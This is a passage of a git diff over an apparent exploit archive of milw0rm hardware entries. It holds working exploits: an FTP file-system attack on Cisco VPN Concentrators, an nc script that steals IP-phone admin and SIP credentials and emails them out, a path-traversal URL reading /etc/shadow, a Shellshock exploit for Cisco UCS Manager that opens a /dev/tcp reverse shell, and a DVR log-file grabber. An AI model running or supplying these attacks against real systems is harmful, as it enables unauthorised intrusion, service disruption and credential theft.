directory %s created\n",directory); - break; - } - } - } - if(idelete==1){ - printf("[ Deleting directory %s\n",directory); - size = 2048 + strlen(directory); - buffer = malloc(size); - sprintf(buffer,"RMD %s\r\n",directory); - rc = send(sd, buffer, strlen(buffer),0); - while((rc = recv(sd, rbuffer,1023,0)) != -1){ - rbuffer[rc]=0; - if(strstr(rbuffer,"250 RMD command successful.") != NULL){ - printf("[ Success! directory %s deleted\n",directory); - break; - } - } - } - if(itest==1){ - printf("[ Testing for the existance of %s\n",file); - size = 2048 + strlen(file); - buffer = malloc(size); - sprintf(buffer,"RNFR %s\r\n",file); - rc = send(sd, buffer,strlen(buffer),0); - while((rc = recv(sd, rbuffer,1023,0)) != -1){ - rbuffer[rc]=0; - if(strstr(rbuffer,"350 RNFR accepted - file exists, ready for destination.") != NULL){ - printf("[ Success! %s does exist!\n",file); - break; - } - if(strstr(rbuffer,"550 File does not exist!") != NULL){ - printf("[ Success! %s does not exist\n",file); - break; - } - } - } - exit(0); -} - -// milw0rm.com [2006-10-24] +/* Cisco VPN Concentrator 3000 FTP remote exploit + * ============================================== + * A vulnerability exists in the Cisco VPN Concentrator 3000, + * an unauthenticated user may access the file system through + * manipulation of FTP service commands. An unauthenticated + * user can use the following commands; + * + * CWD - Change the current working directory + * MKD - Make a directory within the current working directory + * CDUP - Change directory up one tree. + * RNFR - Rename From (This can be used to identify files and directories) + * SIZE - This can be used to identify files and directories + * RMD - This can be used to delete a directory + * + * The FTP service remembers the current working directory so directory + * changes can affect exploitation. By removing potentially sensitive + * directories such as "CERTS" it may be possible to disrupt service + * to a VPN. 
+ *
+ * Confirmed Vulnerable
+ * + Cisco Systems Inc./VPN 3000 concentrator Version 4.1.5 RelJun 18 2004
+ *
+ * Example.
+ * localhost exploits # ./prdelka-vs-CISCO-vpnftp -s 10.1.2.10 -c /
+ * [ Cisco VPN Concentrator 3000 FTP service exploit
+ * [ Connected to 10.1.2.10 (21/tcp)
+ * [ Changing directory to /
+ * [ Success! changed directory to /
+ * localhost exploits # ./prdelka-vs-CISCO-vpnftp -s 10.1.2.10 -t config
+ * [ Cisco VPN Concentrator 3000 FTP service exploit
+ * [ Connected to 10.1.2.10 (21/tcp)
+ * [ Testing for the existance of config
+ * [ Success! file config does exist!
+ *
+ *
+ * - prdelka
+ */
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+int main (int argc, char *argv[]){
+ int ihost=0,index=0,imkdir=0,ichdir=0,idelete=0,itest=0,ipass=0,port=21;
+ int c, sd, rc, size;
+ char *host, *directory, *file, *buffer, *rbuffer;
+ struct sockaddr_in servAddr;
+ struct hostent *h;
+ static struct option options[]={
+ {"server", 1, 0, 's'},
+ {"port", 1, 0, 'p'},
+ {"rmdir", 1, 0, 'r'},
+ {"mkdir", 1, 0, 'm'},
+ {"chdir", 1, 0, 'c'},
+ {"test", 1, 0, 't'},
+ {"help", 0, 0,'h'}
+ };
+ printf("[ Cisco VPN Concentrator 3000 FTP service exploit\n");
+ while(c != -1){
+ c = getopt_long(argc,argv,"s:p:r:m:c:t:h",options,&index);
+ switch(c){
+ case 's':
+ if(ihost==0){
+ h = gethostbyname(optarg);
+ if(h==NULL){
+ printf("[ Error unknown host '%s'\n",optarg);
+ exit(1);
+ }
+ host = malloc(strlen(optarg) + 1);
+ sprintf(host,"%s",optarg);
+ ihost = 1;
+ }
+ break;
+ case 'p':
+ port = atoi(optarg);
+ break;
+ case 'r':
+ if(idelete==0){
+ if(ipass!=1){
+ ipass = 1;
+ idelete = 1;
+ directory = optarg;
+ }
+ else{
+ printf("[ Error: cannot delete directory as another option already selected\n");
+ exit(1);
+ }
+ }
+ break;
+ case 'c':
+ if(ichdir==0){
+ if(ipass!=1){
+ ipass = 1;
+ ichdir = 1;
+ directory = optarg;
+ }
+ else{
+ printf("[ Error: cannot change dir as another option already selected\n");
+ exit(2);
+ }
+ }
+ break;
+ case 't':
+ if(itest==0){
+ if(ipass!=1){
+ ipass = 1;
+ itest = 1;
+ file = optarg;
+ }
+ else{
+ printf("[ Error: cannot test for existance as another option already selected\n");
+ exit(3);
+ }
+ }
+ break;
+ case 'm':
+ if(imkdir==0){
+ if(ipass!=1){
+ ipass = 1;
+ imkdir = 1;
+ directory = optarg;
+ }
+ else{
+ printf("[ Error: cannot make directory as another option already selected\n");
+ exit(4);
+ }
+
+ }
+ break;
+ case 'h':
+ printf("[ Usage instructions.\n[\n");
+ printf("[ %s (optional)\n[\n",argv[0]);
+ printf("[\t--server|-s \n[\t--port|-p (port) [default 21]\n[\t--rmdir|-r (directory)\n[\t--mkdir|-m (directory)\n");
+ printf("[\t--chdir|-c (directory)\n[\t--test|-t (filename/directory)\n[\n");
+ exit(0);
+ break;
+ default:
+ break;
+ }
+ }
+ if(ihost != 1 || ipass != 1){
+ printf("[ Error insufficient arguements, try running '%s --help'\n",argv[0]);
+ exit(1);
+ }
+ servAddr.sin_family = h->h_addrtype;
+ memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
+ servAddr.sin_port = htons(port);
+ sd = socket(AF_INET, SOCK_STREAM, 0);
+ if(sd<0){
+ printf("[ Cannot open socket\n");
+ exit(1);
+ }
+ rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));
+ if(rc<0){
+ printf("[ Cannot connect\n");
+ exit(1);
+ }
+ printf("[ Connected to %s (%d/tcp)\n",host,port);
+ rbuffer = malloc(1024);
+ if(ichdir==1){
+ printf("[ Changing directory to %s\n",directory);
+ size = 2048 + strlen(directory);
+ buffer = malloc(size);
+ sprintf(buffer,"CWD %s\r\n",directory);
+ rc = send(sd, buffer, strlen(buffer),0);
+ while((rc = recv(sd, rbuffer,1023,0)) != -1){
+ rbuffer[rc]=0;
+ if(strstr(rbuffer,"250 Changed to .") != NULL){
+ printf("[ Success! changed directory to %s\n",directory);
+ break;
+ }
+ if(strstr(rbuffer,"530 Can't change directory to") != NULL){
+ printf("[ Error! cannot set current directory to %s\n",directory);
+ exit(-1);
+ }
+ }
+ }
+ if(imkdir==1){
+ printf("[ Making directory %s\n",directory);
+ size = 2048 + strlen(directory);
+ buffer = malloc(size);
+ sprintf(buffer,"MKD %s\r\n",directory);
+ rc = send(sd, buffer, strlen(buffer),0);
+ while((rc = recv(sd, rbuffer,1023,0)) != -1){
+ rbuffer[rc]=0;
+ if(strstr(rbuffer,"257 MKD command successful.") != NULL){
+ printf("[ Success! directory %s created\n",directory);
+ break;
+ }
+ }
+ }
+ if(idelete==1){
+ printf("[ Deleting directory %s\n",directory);
+ size = 2048 + strlen(directory);
+ buffer = malloc(size);
+ sprintf(buffer,"RMD %s\r\n",directory);
+ rc = send(sd, buffer, strlen(buffer),0);
+ while((rc = recv(sd, rbuffer,1023,0)) != -1){
+ rbuffer[rc]=0;
+ if(strstr(rbuffer,"250 RMD command successful.") != NULL){
+ printf("[ Success! directory %s deleted\n",directory);
+ break;
+ }
+ }
+ }
+ if(itest==1){
+ printf("[ Testing for the existance of %s\n",file);
+ size = 2048 + strlen(file);
+ buffer = malloc(size);
+ sprintf(buffer,"RNFR %s\r\n",file);
+ rc = send(sd, buffer,strlen(buffer),0);
+ while((rc = recv(sd, rbuffer,1023,0)) != -1){
+ rbuffer[rc]=0;
+ if(strstr(rbuffer,"350 RNFR accepted - file exists, ready for destination.") != NULL){
+ printf("[ Success! %s does exist!\n",file);
+ break;
+ }
+ if(strstr(rbuffer,"550 File does not exist!") != NULL){
+ printf("[ Success! %s does not exist\n",file);
+ break;
+ }
+ }
+ }
+ exit(0);
+}
+
+// milw0rm.com [2006-10-24]
diff --git a/platforms/hardware/remote/294.pl b/platforms/hardware/remote/294.pl
index 7c9134cda..f6d645a11 100755
--- a/platforms/hardware/remote/294.pl
+++ b/platforms/hardware/remote/294.pl
@@ -167,6 +167,6 @@ $rs.=$rline; } close $remote;
-}
-
-# milw0rm.com [2004-04-28]
+}
+
+# milw0rm.com [2004-04-28]
diff --git a/platforms/hardware/remote/3189.sh b/platforms/hardware/remote/3189.sh
index 113f159fd..c27874a77 100755
--- a/platforms/hardware/remote/3189.sh
+++ b/platforms/hardware/remote/3189.sh
@@ -1,142 +1,142 @@
-#!/bin/bash
-# PR06-14: IP Phones based on Centrality Communications/Aredfox PA168 chipset weak session management vulnerability
-
-# Author: Adrian Pastor [adrian.pastor-AT-procheckup.com] from ProCheckUp
-
-# This advisory has been published following consultation with UK NISCC [http://www.niscc.gov.uk/]
-# Date Found: 3rd November 2006
-# Date Public: 22nd January 2007
-# Vulnerable:
-# Phones confirmed to be vulnerable:
-# - ATCOM AT-320ED IP Phone running SIP firmware version V1.42 and 1.54
-# - SOYO G668 Ethernet IP Phone running SIP firmware version v1.42
-# The following vendors/models also use the same PA168 chipset/firmware
-# and are therefore most likely to be vulnerable to the same issue:
-# - AriaVoice
-# - AT-323 from ATcom
-# - JR168_100B from IPLink
-# - JR168_100W from IPLink
-# - JR168_200 from IPLink
-# - Netweb-401/402 from NetWebGroup
-# - OB-WAN VoIP: Ethernet#1 and Ethernet#2 phones are PA168-based
-# - Vida some phones PA168 based
-# - Wuchuan HOP-1001/1002/1003
-# - Giptel IP phones G100, also Siptronic ST-100 and Siptronic ST-150 (PA168S chipset)
-# - GNET some phones PA168x based
-# - KE1020 Netphone (Meritline)
-# - ML210 Meritline
-# - Integrated Networks IN-1002. Found on eBay.
-# - ArtDio IPF-2000 and IPF-2002L phones
-# - Perfectone IP300
-
-# Severity: Medium
-
-# CVE Candidate: Not assigned
-
-# Overview:
-# There is a problem with the way IP Phones using the PA168 chipset handle
-# authenticated sessions, allowing remote attackers to gain access to the
-# admin web console running as superuser.
-
-# Description:
-# When the superuser account authenticates to the admin web console, a
-# request such as the following is sent to the IP phone's web server:
-
-# POST /a HTTP/1.1
-# Referer: http://192.168.1.100/
-# Host: 192.168.1.100
-# Content-Length: 31
-
-# auth=12345678&login=+++Login+++
-
-# At this point, the superuser session is considered *active* by the web
-# server. All it takes for attackers to perform an administrative task at
-# this point, is for them to send a well-formed request to the web server.
-# Since no authentication tokens or password are submitted within the HTTP
-# requests, anyone can perform administrative tasks while the session is
-# active. Even if the attacker sends the administrative requests from an
-# IP address different to the one used by the superuser account, the IP
-# Phone's web server would accept them as long as the superuser's session
-# is still active.
-
-# A script called "active-session-attack.sh" has been created, which
-# remotely checks repeatedly until a superuser account has logged on by
-# sending a forged superuser request every five seconds. As soon as the
-# superuser session becomes active, the following information will be
-# obtained from the settings page, and emailed to the attacker:
-
-# - IP phone's superuser password - grants administrative access
-# - IP phone's user password - grants restricted access
-# - SIP gateway hostname/IP address
-# - SIP account username
-# - SIP account PIN number
-
-# REQUEST:
-
-# POST /g HTTP/1.1
-# Host: 192.168.1.100
-# Content-Length: 13
-
-# back=++Back++
-
-# RESPONSE (output has been partially omitted for clarification):
-
-# HTTP/1.1 200 OK
-# Content-Length: 16727
-# Content-Type: text/html
-# Connection: close
-
-# IP Phone V1.54
-# [output omitted]
-#
-#
-#
-#
-#
-#
-# [output omitted]
-
-# In order to test this vulnerability, the following steps have been provided:
-
-# 1. Log into http://192.168.1.100 from computer A using the superuser
-# password ('12345678' by default)
-# 2. Send the following curl command from computer B:
-# curl -d "back=++Back++" http://192.168.1.100/g
-# 3. The administrative settings page should be returned without any
-# password required.
-# Note: the IP phone's web server is enabled by default
-# Fix:
-
-# Use access control lists on routers or firewalls in order to only allow
-# trusted IP addresses to access ATCOM AT-320ED IP Phone's web server.
-# Exposing the PA168-based IP Phone's admin web server on the Internet is
-# not recommended.
-
-# References:
-# http://www.voip-info.org/wiki/view/PA168
-# http://www.centralitycomm.com/
-# http://www.aredfox.com/eindex.htm
-# http://www.atcom.cn/En_products_At320ED.html
-# http://www.soyogroup.com/products/proddesc.php?id=307
-# http://www.procheckup.com/Vulner_2007.php
-
-host="192.168.1.100";
-attackers_email="adrian.pastor-AT-procheckup.com"
-req="POST /g HTTP/1.0\r\nContent-length: 13\r\n\r\nback=++Back++\r\n\r\n";
-
-while true
-do
- res=`echo -en $req | nc -nv $host 80`;
- if echo $res | grep superpassword # if this gets returned, then we got the settings page with all SIP account and IP phone creds
- then
- echo "GOT IT!"
- echo $res > "admin-settings-page"
- echo $res | mail $attackers_email -s "PA168 IP Phone admin's settings page"
- exit 1
- else
- echo "bad luck"
- fi
- sleep 5
-done
-
-# milw0rm.com [2007-01-24]
+#!/bin/bash
+# PR06-14: IP Phones based on Centrality Communications/Aredfox PA168 chipset weak session management vulnerability
+
+# Author: Adrian Pastor [adrian.pastor-AT-procheckup.com] from ProCheckUp
+
+# This advisory has been published following consultation with UK NISCC [http://www.niscc.gov.uk/]
+# Date Found: 3rd November 2006
+# Date Public: 22nd January 2007
+# Vulnerable:
+# Phones confirmed to be vulnerable:
+# - ATCOM AT-320ED IP Phone running SIP firmware version V1.42 and 1.54
+# - SOYO G668 Ethernet IP Phone running SIP firmware version v1.42
+# The following vendors/models also use the same PA168 chipset/firmware
+# and are therefore most likely to be vulnerable to the same issue:
+# - AriaVoice
+# - AT-323 from ATcom
+# - JR168_100B from IPLink
+# - JR168_100W from IPLink
+# - JR168_200 from IPLink
+# - Netweb-401/402 from NetWebGroup
+# - OB-WAN VoIP: Ethernet#1 and Ethernet#2 phones are PA168-based
+# - Vida some phones PA168 based
+# - Wuchuan HOP-1001/1002/1003
+# - Giptel IP phones G100, also Siptronic ST-100 and Siptronic ST-150 (PA168S chipset)
+# - GNET some phones PA168x based
+# - KE1020 Netphone (Meritline)
+# - ML210 Meritline
+# - Integrated Networks IN-1002. Found on eBay.
+# - ArtDio IPF-2000 and IPF-2002L phones
+# - Perfectone IP300
+
+# Severity: Medium
+
+# CVE Candidate: Not assigned
+
+# Overview:
+# There is a problem with the way IP Phones using the PA168 chipset handle
+# authenticated sessions, allowing remote attackers to gain access to the
+# admin web console running as superuser.
+
+# Description:
+# When the superuser account authenticates to the admin web console, a
+# request such as the following is sent to the IP phone's web server:
+
+# POST /a HTTP/1.1
+# Referer: http://192.168.1.100/
+# Host: 192.168.1.100
+# Content-Length: 31
+
+# auth=12345678&login=+++Login+++
+
+# At this point, the superuser session is considered *active* by the web
+# server. All it takes for attackers to perform an administrative task at
+# this point, is for them to send a well-formed request to the web server.
+# Since no authentication tokens or password are submitted within the HTTP
+# requests, anyone can perform administrative tasks while the session is
+# active. Even if the attacker sends the administrative requests from an
+# IP address different to the one used by the superuser account, the IP
+# Phone's web server would accept them as long as the superuser's session
+# is still active.
+
+# A script called "active-session-attack.sh" has been created, which
+# remotely checks repeatedly until a superuser account has logged on by
+# sending a forged superuser request every five seconds. As soon as the
+# superuser session becomes active, the following information will be
+# obtained from the settings page, and emailed to the attacker:
+
+# - IP phone's superuser password - grants administrative access
+# - IP phone's user password - grants restricted access
+# - SIP gateway hostname/IP address
+# - SIP account username
+# - SIP account PIN number
+
+# REQUEST:
+
+# POST /g HTTP/1.1
+# Host: 192.168.1.100
+# Content-Length: 13
+
+# back=++Back++
+
+# RESPONSE (output has been partially omitted for clarification):
+
+# HTTP/1.1 200 OK
+# Content-Length: 16727
+# Content-Type: text/html
+# Connection: close
+
+# IP Phone V1.54
+# [output omitted]
+#
+#
+#
+#
+#
+#
+# [output omitted]
+
+# In order to test this vulnerability, the following steps have been provided:
+
+# 1. Log into http://192.168.1.100 from computer A using the superuser
+# password ('12345678' by default)
+# 2. Send the following curl command from computer B:
+# curl -d "back=++Back++" http://192.168.1.100/g
+# 3. The administrative settings page should be returned without any
+# password required.
+# Note: the IP phone's web server is enabled by default
+# Fix:
+
+# Use access control lists on routers or firewalls in order to only allow
+# trusted IP addresses to access ATCOM AT-320ED IP Phone's web server.
+# Exposing the PA168-based IP Phone's admin web server on the Internet is
+# not recommended.
+
+# References:
+# http://www.voip-info.org/wiki/view/PA168
+# http://www.centralitycomm.com/
+# http://www.aredfox.com/eindex.htm
+# http://www.atcom.cn/En_products_At320ED.html
+# http://www.soyogroup.com/products/proddesc.php?id=307
+# http://www.procheckup.com/Vulner_2007.php
+
+host="192.168.1.100";
+attackers_email="adrian.pastor-AT-procheckup.com"
+req="POST /g HTTP/1.0\r\nContent-length: 13\r\n\r\nback=++Back++\r\n\r\n";
+
+while true
+do
+ res=`echo -en $req | nc -nv $host 80`;
+ if echo $res | grep superpassword # if this gets returned, then we got the settings page with all SIP account and IP phone creds
+ then
+ echo "GOT IT!"
+ echo $res > "admin-settings-page"
+ echo $res | mail $attackers_email -s "PA168 IP Phone admin's settings page"
+ exit 1
+ else
+ echo "bad luck"
+ fi
+ sleep 5
+done
+
+# milw0rm.com [2007-01-24]
diff --git a/platforms/hardware/remote/3294.txt b/platforms/hardware/remote/3294.txt
index 5fd273fef..c9e7f0c8a 100755
--- a/platforms/hardware/remote/3294.txt
+++ b/platforms/hardware/remote/3294.txt
@@ -1,66 +1,66 @@
-I - TITLE
-
-Security advisory: Arbitrary file disclosure vulnerability in
- IP3 NetAccess leads to full system compromise
-
-II - SUMMARY
-
-Description: Arbitrary file disclosure vulnerability in IP3 NetAccess
- leads to full system compromise
-
-Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com)
-
-Date: February 11th, 2007
-
-Severity: High
-
-References: http://www.devtarget.org/ip3-advisory-02-2007.txt
-
-III - OVERVIEW
-
-IP3's NetAccess is a device created for high demand environments
-such as convention centers or hotels. It handles the Internet access
-and provides for instance firewalling, billing, rate-limiting as well
-as various authentication mechanisms. The device is administrated via
-SSH or a web-based GUI. Further information about the product can be
-found online at http://www.ip3.com/poverview.htm.
-
-IV - DETAILS
-
-Due to inproper input validation, all NetAccess devices with a firmware version
-less than 4.1.9.6 are vulnerable to an arbitrary file disclosure vulnerability.
-This vulnerability allows an unauthenticated remote attacker to abuse the
-web interface and read any file on the remote system. Due to the fact that important
-system files are world-readable (see bid #17698), this does include /etc/shadow
-and thus leads to a full compromise of the device! In addition an attacker is
-able to gain access to the proprietary code base of the device and potentially
-identify as well as exploit other (yet unknown) vulnerabilities.
-
-V - EXPLOIT CODE
-
-The trivial vulnerability can be exploited by accessing the file "getfile.cgi"
-with a relative file path such as
-
-http://$target/portalgroups/portalgroups/getfile.cgi?filename=../../../../../../../../etc/shadow
-
-As the input to the "filename" parameter is not properly validated accessing
-this URL will disclose the contents of /etc/shadow to a remote attacker.
-
-VI - WORKAROUND/FIX
-
-To address this problem, the vendor has released a new firmware version
-(4.1.9.6) which is available at http://www.ip3.com. Hence all users of IP3's NetAccess
-devices are asked to install this version immediately.
-
-As a temporary workaround, one may also limit the accessibility of the web interface
-of the device to authorized personnel only. Nevertheless contacting the vendor and
-installing the new firmware version is highly recommended!
-
-VII - DISCLOSURE TIMELINE
-
-31. December 2006 - Notified vendor
-31. December 2006 - Vulnerability confirmed
-17. January 2007 - Patch released
-11. February 2007 - Public disclosure
-
-# milw0rm.com [2007-02-11]
+I - TITLE
+
+Security advisory: Arbitrary file disclosure vulnerability in
+ IP3 NetAccess leads to full system compromise
+
+II - SUMMARY
+
+Description: Arbitrary file disclosure vulnerability in IP3 NetAccess
+ leads to full system compromise
+
+Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com)
+
+Date: February 11th, 2007
+
+Severity: High
+
+References: http://www.devtarget.org/ip3-advisory-02-2007.txt
+
+III - OVERVIEW
+
+IP3's NetAccess is a device created for high demand environments
+such as convention centers or hotels. It handles the Internet access
+and provides for instance firewalling, billing, rate-limiting as well
+as various authentication mechanisms. The device is administrated via
+SSH or a web-based GUI. Further information about the product can be
+found online at http://www.ip3.com/poverview.htm.
+
+IV - DETAILS
+
+Due to inproper input validation, all NetAccess devices with a firmware version
+less than 4.1.9.6 are vulnerable to an arbitrary file disclosure vulnerability.
+This vulnerability allows an unauthenticated remote attacker to abuse the
+web interface and read any file on the remote system. Due to the fact that important
+system files are world-readable (see bid #17698), this does include /etc/shadow
+and thus leads to a full compromise of the device! In addition an attacker is
+able to gain access to the proprietary code base of the device and potentially
+identify as well as exploit other (yet unknown) vulnerabilities.
+
+V - EXPLOIT CODE
+
+The trivial vulnerability can be exploited by accessing the file "getfile.cgi"
+with a relative file path such as
+
+http://$target/portalgroups/portalgroups/getfile.cgi?filename=../../../../../../../../etc/shadow
+
+As the input to the "filename" parameter is not properly validated accessing
+this URL will disclose the contents of /etc/shadow to a remote attacker.
+
+VI - WORKAROUND/FIX
+
+To address this problem, the vendor has released a new firmware version
+(4.1.9.6) which is available at http://www.ip3.com. Hence all users of IP3's NetAccess
+devices are asked to install this version immediately.
+
+As a temporary workaround, one may also limit the accessibility of the web interface
+of the device to authorized personnel only. Nevertheless contacting the vendor and
+installing the new firmware version is highly recommended!
+
+VII - DISCLOSURE TIMELINE
+
+31. December 2006 - Notified vendor
+31. December 2006 - Vulnerability confirmed
+17. January 2007 - Patch released
+11. February 2007 - Public disclosure
+
+# milw0rm.com [2007-02-11]
diff --git a/platforms/hardware/remote/39568.py b/platforms/hardware/remote/39568.py
new file mode 100755
index 000000000..59975c2ff
--- /dev/null
+++ b/platforms/hardware/remote/39568.py
@@ -0,0 +1,65 @@ +#!/usr/bin/python +############################################### +# Cisco UCS Manager 2.1(1b) Shellshock Exploit +# +# CVE-2014-6278 +# Confirmed on version 2.1(1b), but more are likely vulnerable. +# Cisco's advisory: +# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash +# Exploit generates a reverse shell to a nc listener. +# Exploit Author: @thatchriseckert +############################################### + +import sys +import requests +import time + +if len(sys.argv) < 4: + print "\n[*] Cisco UCS Manager 2.1(1b) Shellshock Exploit" + print "[*] Usage: " + print "[*]" + print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 4444" + print "[*] Listener: nc -lvp " + print "\n" + sys.exit() + +#Disables request warning for cert validation ignore. +requests.packages.urllib3.disable_warnings() +ucs = sys.argv[1] +url = "https://" + ucs + "/ucsm/isSamInstalled.cgi" +attackhost = sys.argv[2] +revshellport = sys.argv[3] +headers1 = { + 'User-Agent': '() { ignored;};/bin/bash -i >& /dev/tcp/' + attackhost + '/' + revshellport + ' 0>&1' + } +headers2 = { + "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo $(http://[ip]/goform/QuickStart_c0 - =>source - =>password disclosure on 'Input typepassword' - -# verification on www.skynet.be - -# Vulnerability Found By NeoCoderz - -# mail:NeoCoderz1@msn.com - fReNcH HaCkInG Is NoT dEaD ... - eNjoY iT .... 
---------------------------------------------------------------------------------- - -# milw0rm.com [2007-12-18] +-------------------------------------------------------------------------------- + +# WebServer powered by goahead WEBSERVER + +# Vulnerability on : FS4104-AW - Full-Service VDSL Device + +# exemple : IP : 81.240.1.1 to 81.240.1.254 / port : 80 + +# exploit : =>http://[ip]/goform/QuickStart_c0 + =>source + =>password disclosure on 'Input typepassword' + +# verification on www.skynet.be + +# Vulnerability Found By NeoCoderz + +# mail:NeoCoderz1@msn.com + fReNcH HaCkInG Is NoT dEaD ... + eNjoY iT .... +--------------------------------------------------------------------------------- + +# milw0rm.com [2007-12-18] diff --git a/platforms/hardware/remote/4797.pl b/platforms/hardware/remote/4797.pl index fe0d1db0c..323135850 100755 --- a/platforms/hardware/remote/4797.pl +++ b/platforms/hardware/remote/4797.pl 
@@ -1,101 +1,101 @@
-#!/usr/bin/perl
-#
-# March Networks DVR 3204 Logfile Information Disclosure Exploit
-#
-# Since configuration of the IP address, user console and root is
-# carried out over the "administrator console", the vulnerability
-# lies within Watchdog's HTTP server application.
-#
-# Any user can obtain the log files without authentication by accessing
-# the following PATH http:/dvraddress/scripts/logfiles.tar.gz. The intruder
-# can then uncompress the tar file and access the config.dat to reveal
-# username and passwords, names of devices, and IP addresses of other
-# security components attached to the corporate networ
-#
-# More details:
-# http://www.sybsecurity.com/resources/static/
-# An_Insecurity_Overview_of_the_March_Networks_DVR-CCTV_3204.pdf
-#
-# By Alex Hernandez ahernandez [at] sybsecurity [dot] com
-#
-# Usage: perl -x dvr3204_exp.pl www.marchnetworks.com:80
-# Usage: perl -x dvr3204_exp.pl 127.0.0.1:80
-#
-# $ perl -x dvr3204_exp.pl 10.50.10.246:80
-# Trying...
-#
-# THIS HOST IS VULNERABLE!!! :-)
-# Check the details on w w w [dot] sybsecurity [dot] c o m
-#
-# THIS HOST IS NOT VULNERABLE :-(
-# Check the settings on browser...
-#
-#
-
-use Socket;
-
-if ($#ARGV<0) {die "
-\nMarch Networks DVR 3204 exploit\n
-More details: http://www.sybsecurity.com
-By Alex Hernandez\n
-ahernandez [at] sybsecurity [dot] com\n
-
-Usage: perl -x $0 www.marchnetworks.com:80
-Usage: perl -x $0 127.0.0.1:80\n\n";}
-
-($host,$port)=split(/:/,@ARGV[0]);
-
-print "Trying...\n\n";
-$target = inet_aton($host);
-$flag=0;
-
-my @results=sendraw("GET /Level1Authenticate.htm HTTP/1.0\r\n\r\n");
-foreach $line (@results){
- if ($line =~ /Directory/) {$flag=1;}}
-
-my @results=sendraw("GET /UserAuthenticate.htm HTTP/1.0\r\n\r\n");
-foreach $line (@results){
- if ($line =~ /Directory/) {$flag=1;}}
-
-my @results=sendraw("GET /public/index.htm HTTP/1.0\r\n\r\n");
-foreach $line (@results){
- if ($line =~ /Directory/) {$flag=1;}}
-
-my @results=sendraw("GET /public/UpgradeStatus.htm HTTP/1.0\r\n\r\n");
-foreach $line (@results){
- if ($line =~ /Directory/) {$flag=1;}}
-
-my @results=sendraw("GET /public/UpgradeHistory.htm HTTP/1.0\r\n\r\n");
-foreach $line (@results){
- if ($line =~ /Directory/) {$flag=1;}}
-
-my @results=sendraw("GET /public/UpgradeHistory.txt HTTP/1.0\r\n\r\n");
-foreach $line (@results){
- if ($line =~ /Directory/) {$flag=1;}}
-
-my @results=sendraw("GET /public/dvrlog HTTP/1.0\r\n\r\n");
-foreach $line (@results){
- if ($line =~ /Directory/) {$flag=1;}}
-
-my @results=sendraw("GET /scripts/logfiles.tar.gz HTTP/1.0\r\n\r\n");
-foreach $line (@results){
- if ($line =~ /Directory/) {$flag=1;}}
-
-if ($flag==1){print "THIS HOST IS VULNERABLE!!! :-)\n
-Check the details on www [dot] sybsecurity [dot] com\n";}
-else {print "THIS HOST IS NOT VULNERABLE :-( \n
-Check the settings on browser...\n";}
-
-sub sendraw {
- my ($pstr)=@_;
- socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
- die("Socket problems\n");
- if(connect(S,pack "SnA4x8",2,$port,$target)){
- my @in;
- select(S); $|=1; print $pstr;
- while(){ push @in, $_;}
- select(STDOUT); close(S); return @in;
- } else { die("Can't connect check the port or address...\n"); }
-}
-
-# milw0rm.com [2007-12-27]
+#!/usr/bin/perl
+#
+# March Networks DVR 3204 Logfile Information Disclosure Exploit
+#
+# Since configuration of the IP address, user console and root is
+# carried out over the "administrator console", the vulnerability
+# lies within Watchdog's HTTP server application.
+#
+# Any user can obtain the log files without authentication by accessing
+# the following PATH http:/dvraddress/scripts/logfiles.tar.gz. The intruder
+# can then uncompress the tar file and access the config.dat to reveal
+# username and passwords, names of devices, and IP addresses of other
+# security components attached to the corporate networ
+#
+# More details:
+# http://www.sybsecurity.com/resources/static/
+# An_Insecurity_Overview_of_the_March_Networks_DVR-CCTV_3204.pdf
+#
+# By Alex Hernandez ahernandez [at] sybsecurity [dot] com
+#
+# Usage: perl -x dvr3204_exp.pl www.marchnetworks.com:80
+# Usage: perl -x dvr3204_exp.pl 127.0.0.1:80
+#
+# $ perl -x dvr3204_exp.pl 10.50.10.246:80
+# Trying...
+#
+# THIS HOST IS VULNERABLE!!! :-)
+# Check the details on w w w [dot] sybsecurity [dot] c o m
+#
+# THIS HOST IS NOT VULNERABLE :-(
+# Check the settings on browser...
+#
+#
+
+use Socket;
+
+if ($#ARGV<0) {die "
+\nMarch Networks DVR 3204 exploit\n
+More details: http://www.sybsecurity.com
+By Alex Hernandez\n
+ahernandez [at] sybsecurity [dot] com\n
+
+Usage: perl -x $0 www.marchnetworks.com:80
+Usage: perl -x $0 127.0.0.1:80\n\n";}
+
+($host,$port)=split(/:/,@ARGV[0]);
+
+print "Trying...\n\n";
+$target = inet_aton($host);
+$flag=0;
+
+my @results=sendraw("GET /Level1Authenticate.htm HTTP/1.0\r\n\r\n");
+foreach $line (@results){
+ if ($line =~ /Directory/) {$flag=1;}}
+
+my @results=sendraw("GET /UserAuthenticate.htm HTTP/1.0\r\n\r\n");
+foreach $line (@results){
+ if ($line =~ /Directory/) {$flag=1;}}
+
+my @results=sendraw("GET /public/index.htm HTTP/1.0\r\n\r\n");
+foreach $line (@results){
+ if ($line =~ /Directory/) {$flag=1;}}
+
+my @results=sendraw("GET /public/UpgradeStatus.htm HTTP/1.0\r\n\r\n");
+foreach $line (@results){
+ if ($line =~ /Directory/) {$flag=1;}}
+
+my @results=sendraw("GET /public/UpgradeHistory.htm HTTP/1.0\r\n\r\n");
+foreach $line (@results){
+ if ($line =~ /Directory/) {$flag=1;}}
+
+my @results=sendraw("GET /public/UpgradeHistory.txt HTTP/1.0\r\n\r\n");
+foreach $line (@results){
+ if ($line =~ /Directory/) {$flag=1;}}
+
+my @results=sendraw("GET /public/dvrlog HTTP/1.0\r\n\r\n");
+foreach $line (@results){
+ if ($line =~ /Directory/) {$flag=1;}}
+
+my @results=sendraw("GET /scripts/logfiles.tar.gz HTTP/1.0\r\n\r\n");
+foreach $line (@results){
+ if ($line =~ /Directory/) {$flag=1;}}
+
+if ($flag==1){print "THIS HOST IS VULNERABLE!!! :-)\n
+Check the details on www [dot] sybsecurity [dot] com\n";}
+else {print "THIS HOST IS NOT VULNERABLE :-( \n
+Check the settings on browser...\n";}
+
+sub sendraw {
+ my ($pstr)=@_;
+ socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
